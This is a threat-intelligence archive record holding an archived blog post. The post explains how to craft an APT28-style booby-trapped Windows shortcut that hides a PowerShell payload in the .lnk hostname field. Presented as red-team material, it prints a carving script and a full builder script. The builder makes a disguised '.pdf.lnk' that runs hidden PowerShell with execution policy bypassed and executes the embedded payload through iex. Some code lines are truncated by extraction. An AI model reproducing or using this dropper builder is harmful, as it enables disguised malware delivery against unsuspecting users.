{ "id": "ca0edb95-d102-42fa-9fab-7c80b4a2aa76", "created_at": "2026-04-29T02:21:32.046646Z", "updated_at": "2026-04-29T08:22:25.512494Z", "deleted_at": null, "sha1_hash": "d875b720ccd613fbc1e75af0cb19acf4a6ea88e1", "title": "Booby trap a shortcut with a backdoor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 790232, "plain_text": "Booby trap a shortcut with a backdoor\r\nBy Felix Weyne\r\nArchived: 2026-04-29 02:09:37 UTC\r\nThe Wayback Machine - https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\n Posted by Felix, April 2017.\r\n Author contact: Twitter | Mail | LinkedIn\r\n Tags: booby trapped shortcut, penetration testing, fancy bear APT, red team exercise, lnk file, powershell,\r\nshortcut backdoor\r\nEmbedding a shortcut (.lnk file) which points to powershell (accompanied by an encoded command) in a word\r\ndocument or zip file is a known sneaky trick to spread malware. The trick was alledegly also used by a Russian\r\nAPT group called grizzly bear (source: Volexity, CrowdStrike), the same group who allegedly is responsible for\r\nhacking and influencing the american elections in 2016. The alleged boobytrapped shortcut used by fancy bear\r\nagainst research institutes contains a feature that I haven't seen before. The shortcut not only calls powershell with\r\nan encoded command, but it also embeds an entire payload which isn't stored in the encoded command. Instead,\r\nthe payload is stored in a hidden property field of the shortcut.\r\nStudying and reverse engineering this sample is very usefull for red team penetration testers (people who\r\nchallenge the defense of their own infrastructure in order to identify shortcomings and suggest possible\r\nimprovements). In this blog I will explain how to create a 'fancy bear' like booby trapped shortcut. This\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 1 of 9\n\ndropper can be used for penetration testing purposes. The dropper has three distinguishable parts, these are\r\nvisualized on image one and will be discussed throughout the blog.\r\nImage one: Three parts of the booby trapped shortcut: shortcut target set to powershell, carving script and\r\nembedded payload.\r\nCircumventing the target length limitation\r\nCreating a shortcut in Windows is very straightforward: right click on the desktop, and select 'New, shortcut'. A\r\ndialog window will pop up to ask you the location of the object. Once the shortcut is created, we can inspect its\r\nproperties and add parameters to the target of the shortcut, as shown on image two.\r\nThe number of characters in the target field of the GUI properties window is limited to two hundred sixty (260)\r\ncharacters. Because of the character limitation, we can only make the shortcut point to for instance a\r\npowershell executable (in order to create a backdoor with the shortcut), with a tiny additional encoded\r\ncommand added as a parameter.\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 2 of 9\n\nImage two: (Top:) Shortcuts target path, as shown in the shortcuts properties GUI \u0026 a hex editor. (Bottom:)\r\nExtending the target character limitation via jscript.\r\nThe maximum target length can be extended though by creating the shortcut via a jscript making use of the\r\n'WScript Shell' object. The GUI properties window will still clip the target field at two hundred sixty characters,\r\nbut the 'WScript Shell' object will only clip the target parameter at one thousand ninety-six (1096) characters. The\r\nfull target path can be inspected by opening the shortcut in a hex editor, as shown on image two.\r\nAbusing the LNK format\r\nAlthough we have found a way to extend the shortcut target length and thus the length of the parameter\r\npassed to powershell, this still isn't long enough to pass a large, decent scriptblock to powershell. The\r\ncreators of the (alleged Russian) malware detected by Volexity also came to the same conclusion. They however\r\nstudied the shell link binary file format specification well.\r\nWhen a shortcut is created, a lot of metadata of the machine which created the shortcut are also stored inside the\r\nshortcut. Examples are the drive label and the hostname, as shown on image three (highlighted in red and green).\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 3 of 9\n\nImage three: (Top:) host artifacts hidden in the shortcut. (Bottom:) Extract of the shell link binary file format\r\nspecification.\r\nWhen I inspected the link format specification, I noticed that some of these metadata fields may have a variable,\r\nunlimited length. An example of such a field is the hostname. The fact that the hostname stored in the shortcut\r\nmay contain an arbitrary long value makes it useful to store a large payload. This payload can be a large\r\nscript block, something which the shortcut target field didn't allow us to store.\r\nCreating a booby trapped shortcut\r\nWith the information above, we now have the ingredients to craft a booby trapped shortcut. The backdoored\r\nshortcut can be created in any programming language, I have chosen powershell as my scripting language. The\r\nbooby trapped shortcut will consist of three main parts, as shown on image one.\r\nFor the first part we need to create a carving script: a powershell script which will look for the embedded payload\r\ninside the shortcut. The carving script will be saved as an encoded parameter to powershell in the shortcuts target\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 4 of 9\n\nfield. When a user opens the shortcut (the lnk file), the carving script will be executed. This carving script\r\nwill look for the stored payload hidden in the hostname field. The carving script is shown below, you can see\r\nit being passed to powershell in the shortcuts target field on image four.\r\nImage four: Booby trapped shortcut looks like an innocent document untill its properties are inspected.\r\n#--Carving script: will find and decode the script block\r\n#--embedded in the shortcuts hostname\r\n$payloadStartIndexInShortcut=1000;\r\n$payloadSize=100;\r\n$shortcutFilename=\"interesting-title.lnk\";\r\n#create a byte array to store the encoded payload\r\n$encodedPayloadBytes=New-Object byte[]($payloadSize);\r\n#read the contents of the shortcut, starting from $payloadStart\r\n$lnk=New-Object IO.FileStream $shortcutFilename,'Open','Read','ReadWrite';\r\n$lnk.Seek($payloadStartIndexInShortcut,[IO.SeekOrigin]::Begin);\r\n$lnk.Read($encodedPayloadBytes,0,$payloadSize);\r\n#Base64 decode encoded payload\r\n$decodedPayloadBytes=[Convert]::FromBase64CharArray($encodedPayloadBytes,0,$encodedPayloadBytes.Lengt\r\n$scriptBlock=[Text.Encoding]::Unicode.GetString($decodedPayloadBytes);\r\n#execute payload (script block)\r\niex $scriptBlock;\r\nThe second goal is to create a shortcut which will link to powershell and pass the carving script. This\r\nshortcut will be created with the method to bypass the shortcuts target length limitation, as discussed earlier in this\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 5 of 9\n\nblog. The last goal is to actually write the payload: this payload is a powershell script which does not have\r\nany length limitations. The payload script can for instance contain a base64 encoded executable in a variable.\r\nThis embedded executable can be written to disk or loaded into memory. The options for the payload are\r\nunlimited.\r\nThe result of the three goals combined can be found below. The result is a powershell script which creates a\r\nbooby trapped shortcut, with a configurable payload. This script can be used for penetration testing purposes\r\non systems where you have the permission to penetrate. The script may be copied as long as the script contains an\r\nattribution to the original author.\r\n#\r\n# Create backdoored LNK file - by Felix Weyne\r\n# Info: https://www.uperesia.com/booby-trapped-shortcut\r\n# -Usage: place your powershell payload in $payloadContents\r\n# -This payload can embed for instance an executable that needs\r\n# -to be dropped to disk/loaded into memory\r\n#\r\n$shortcutName = \"interesting-title-to-click-on.pdf.lnk\"\r\n$shortcutOutputPath = \"$Home\\Desktop\\\"+$shortcutName\r\n$shortcutFallbackExecutionFolder=\"`$env:temp\"\r\n$payloadContents =\r\n@'\r\n echo \"This payload/script block can be huge, easily a few megabytes\";\r\n echo $env:computername \u003e\u003e $Home\\Desktop\\IhaveRun.txt\r\n echo $env:computername \u003e\u003e $Home\\Desktop\\IhaveRun.txt\r\n'@\r\n$bytes = [System.Text.Encoding]::Unicode.GetBytes($payloadContents)\r\n$payload = [Convert]::ToBase64String($bytes)\r\nfunction Convert-ByteArrayToHexString($inputByteArray)\r\n{\r\n $String = [System.BitConverter]::ToString($inputByteArray)\r\n $String = $String -replace \"\\-\",\"\"\r\n $String\r\n}\r\nfunction Convert-HexStringToByteArray ($hexString) {\r\n $hexString = $hexString.ToLower()\r\n ,@($hexString -split '([a-f0-9]{2})' | foreach-object { if ($_) {[System.Convert]::ToByte($_,16)}\r\n}\r\nfunction CreateShortcut($payloadStart,$payloadSize) {\r\n#\u003c------\u003e\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 6 of 9\n\n#\u003cPart 1: encode carving script\u003e\r\n#\u003c------\u003e\r\n#$stP = startPayload, $siP = sizePayload,\r\n#$scB = scriptblock, $lnk = filestream LNK file\r\n#$b64 = base64 encoded scriptblok, $f=shortcut name\r\n$carvingScript = @'\r\n$stP,$siP={0},{1};\r\n$f='{2}';\r\nif(-not(Test-Path $f)){{\r\n$x=Get-ChildItem -Path {3} -Filter $f -Recurse;\r\n[IO.Directory]::SetCurrentDirectory($x.DirectoryName);\r\n}}\r\n$lnk=New-Object IO.FileStream $f,'Open','Read','ReadWrite';\r\n$b64=New-Object byte[]($siP);\r\n$lnk.Seek($stP,[IO.SeekOrigin]::Begin);\r\n$lnk.Read($b64,0,$siP);\r\n$b64=[Convert]::FromBase64CharArray($b64,0,$b64.Length);\r\n$scB=[Text.Encoding]::Unicode.GetString($b64);\r\niex $scB;\r\n'@ -f $payloadStart,$payloadSize,$shortcutName,$shortcutFallbackExecutionFolder\r\n write-host \"Generated carvingscript:\" -foregroundcolor \"yellow\"\r\n echo $carvingScript;\r\n $compressedCarvingScript = $carvingScript -replace \"`n\",'' -replace \"`r\",''\r\n # Convert string to base64 encoded command\r\n $bytes = [System.Text.Encoding]::ASCII.GetBytes( $compressedCarvingScript )\r\n $encodedCommand = [Convert]::ToBase64String($bytes)\r\n \r\n #\u003c------\u003e\r\n #\u003cPart 2: create shortcut with encoded carving script\u003e\r\n #\u003c------\u003e\r\n $WshShell = New-Object -comObject WScript.Shell\r\n $Shortcut = $WshShell.CreateShortcut($shortcutOutputPath)\r\n $Shortcut.TargetPath = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\r\n $Shortcut.Arguments = \"-win hidden -Ep ByPass `$r = [Text.Encoding]::ASCII.GetString([Convert]::F\r\n $Shortcut.IconLocation = \"C:\\Windows\\system32\\SHELL32.dll, 1\"\r\n $Shortcut.Save()\r\n}\r\n#\u003c------\u003e\r\n#\u003cPart 3: find start of embedded payload (start of computer hostname)\u003e\r\n#\u003c------\u003e\r\nwrite-host \"Creating LNK with payload. This will enable us to see where the payload starts\" -foregrou\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 7 of 9\n\n$payloadSize = $payload.Length\r\nCreateShortcut 9999 $payloadSize\r\n$enc = [system.Text.Encoding]::UTF8\r\n[string]$computerName = $ENV:COMPUTERNAME\r\n$computerNameBytes = $enc.GetBytes($computerName.ToLower())\r\n$readin = [System.IO.File]::ReadAllBytes($shortcutOutputPath);\r\n$contentsLnkFile = (Convert-ByteArrayToHexString $readin) -join ''\r\n$computerNameInHex = (Convert-ByteArrayToHexString $computerNameBytes) -join ''\r\n$startPayload = ($contentsLnkFile.IndexOf($computerNameInHex)) / 2\r\nwrite-host \"Start of payload in LNK file is at byte: #\"$startPayload -foregroundcolor \"green\"\r\n#\u003c------\u003e\r\n#\u003cPart 3: create new link with correct start of payload\r\n#\u003c------\u003e\r\nRemove-Item $shortcutOutputPath\r\nCreateShortcut $startPayload $payloadSize\r\nwrite-host \"Output LNK file: \" $shortcutOutputPath -foregroundcolor \"Cyan\"\r\n#\u003c------\u003e\r\n#\u003cPart 4: embed payload\r\n#\u003c------\u003e\r\n$payloadBytes = $enc.GetBytes($payload)\r\n$payloadInHex = Convert-ByteArrayToHexString $payloadBytes\r\n$readin = [System.IO.File]::ReadAllBytes($shortcutOutputPath);\r\n$contentsLnkFile = (Convert-ByteArrayToHexString $readin) -join ''\r\n$contentsLnkFile = $contentsLnkFile -replace $computerNameInHex,$payloadInHex;\r\n$writeout = Convert-HexStringToByteArray $contentsLnkFile;\r\nset-content -value $writeout -encoding byte -path $shortcutOutputPath;\r\nReferences\r\nDemocratic National Committee cyber attacks, Wikipedia\r\nCrowdStrike linking fancy bear to Russia, The Washington Post\r\nBooby trapped shortcut used by fancy bear, Volexity\r\nmalicious shortcut sample sent by fancy bear to think tanks and NGOs (zipped, password=6190), VirusTotal\r\nLnk files spreading Kovter click-fraud trojan and Locky ransomware, Microsoft\r\nShell link binary file format specification, Microsoft\r\nBear’s election campaign, in depth analysis of the alleged Russian booby trapped shortcut\r\ngenerated booby trapped shortcut with the above script (ASCII Rick Astley)\r\nvirustotal detection on booby trapped shortcut, generated with the powershell script in this blog\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 8 of 9\n\nSource: https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nhttps://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut" ], "report_names": [ "booby-trapped-shortcut" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-29T06:58:56.194866Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Forest Blizzard", "STRONTIUM", "Blue Athena", "T-APT-12", "UAC-0028", "UAC-0001", "Fancy Bear", "TG-4127", "TA422", "Sofacy", "BlueDelta", "GruesomeLarch", "Pawn Storm", "FANCY BEAR", "SNAKEMACKEREL", "Group 74", "SIG40", "Grizzly Steppe", "Fighting Ursa", "ITG05", "Sednit", "Tsar Team", "IRON TWILIGHT", "G0007", "ATK5", "APT-C-20", "FROZENLAKE" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-29T06:58:57.48365Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-29T06:58:57.725302Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "LAMEHUG", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-29T06:58:58.181568Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1777429292, "ts_updated_at": 1777450945, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d875b720ccd613fbc1e75af0cb19acf4a6ea88e1.pdf", "text": "https://archive.orkl.eu/d875b720ccd613fbc1e75af0cb19acf4a6ea88e1.txt", "img": "https://archive.orkl.eu/d875b720ccd613fbc1e75af0cb19acf4a6ea88e1.jpg" } }